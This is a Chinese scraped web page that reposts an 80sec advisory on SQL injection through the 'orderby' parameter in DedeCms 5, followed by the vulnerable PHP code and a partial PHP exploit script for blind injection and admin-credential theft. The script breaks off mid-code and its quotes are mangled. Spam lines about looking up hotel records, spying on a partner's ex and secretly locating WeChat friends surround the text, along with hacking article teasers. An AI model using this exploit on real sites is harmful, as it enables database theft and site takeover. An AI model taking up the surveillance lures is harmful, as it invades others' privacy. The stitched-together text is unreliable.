全国开房记录怎么查询) 怎么能查询老婆和前男
漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工 *** 的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内更流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。漏洞厂商:http://www.dedecms.com漏洞来源:http://www.80sec.com/release/dedecms-sql-injection.txt漏洞解析:在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下 Quote: -------------------------------------------------------if(empty($orderby)) $orderby = 'pubdate';//重载列表if($dopost=='getlist'){PrintAjaxHead();GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数$dsql->Close();exit();……function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){global $cfg_phpurl,$cfg_ml;$jobs = array();$start = ($pageno-1) * $pagesize;$dsql->SetQuery("Select * From dede_jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");$dsql->Execute();//orderby 带入数据库查询……----------------------------------------------------------漏洞利用:80sec提供攻击测试代码如下(如果发现代码无法测试,请访问80sec官方的txt文档): Quote: <?print_r('--------------------------------------------------------------------------------DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploitBY Flyh4twww.wolvez.orgThx for all the members of W.S.T and my friend Oldjun--------------------------------------------------------------------------------');if ($argc<3) {print_r('--------------------------------------------------------------------------------Usage: php '.$argv[0].’ host pathhost: target server (ip/hostname)path: path to DEDEcmsExample:php ‘.$argv[0].’ localhost /——————————————————————————–‘);die;}function sendpacketii($packet){global $host, $html;$ock=fsockopen(gethostbyname($host),’80′);if (!$ock) {echo ‘No response from ‘.$host; die;}fputs($ock,$packet);$html=”;while (!feof($ock)) {$html.=
相关文章
黑客辅助挂,黑客网络kfc怎么过,网站会被 黑客攻击吗
用javascript从远处源下载歹意软件:1.3 在野外发现新的FinSpy iOS和Android植入东西爆炸形式运用DNS-ShellWindows (386/amd64)客户端是要装置在方针机...
偷偷获取微信好友位置(黑客教你定位手机位置)
第一种方法是要求对方主动发送立场。例如,如果你想找一个朋友,但不知道他的位置,你可以让他把他的位置发送给你。至此,你的目标就实现了,但如果你想从手机上拿到他的位置,可能并不容易。您可以打开位置共享,从...
今年冬天会冷吗2020到2021-今年冬天会冷吗2020预计会下雪吗-预计今年冬天
今年冬天会冷吗2020到2021-今年冬天会冷吗2020预计会下雪吗-预计今年冬天 如今大伙儿外出早已感受到一阵阵凉爽了,记忆中的秋季也到来了,实际上在10月份早已寒露了,仅仅溫度还较为高,也有秋老...
学校铺面适合做什么好(适合学校的项目推荐)
招商帮:我们都知道,在学校门口做生意一般客源比较稳定,而且大多都是学生、老师和家长,消费水平也比较低,所以很适合一些初期想要创业的朋友们。相信每个人都经历过学生时期,也知道在学校门口一出来看到卖各种各...
黑客群视频(关于黑客视频)
黑客可以把自己手机视频发布吗 1、可以。黑客是一群晃荡于网络上的技术人员,他们熟悉操作的设计与维护;精于找出使用者的密码,通晓计算机,进入他人计算机操作系统的高手,包括一些人所说的内鬼其实也是指技术人...
集中注意力(注意力训练的十个方法)
集中注意力(注意力训练的十个方法) 注意力,是让我们能坚持完成工作的一个重要因素。 而对于现在很多人来说,注意力缺失却成为了他们无法专注完成目标的“头号杀手”。 由于在学习或者工作期间,他们不断...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!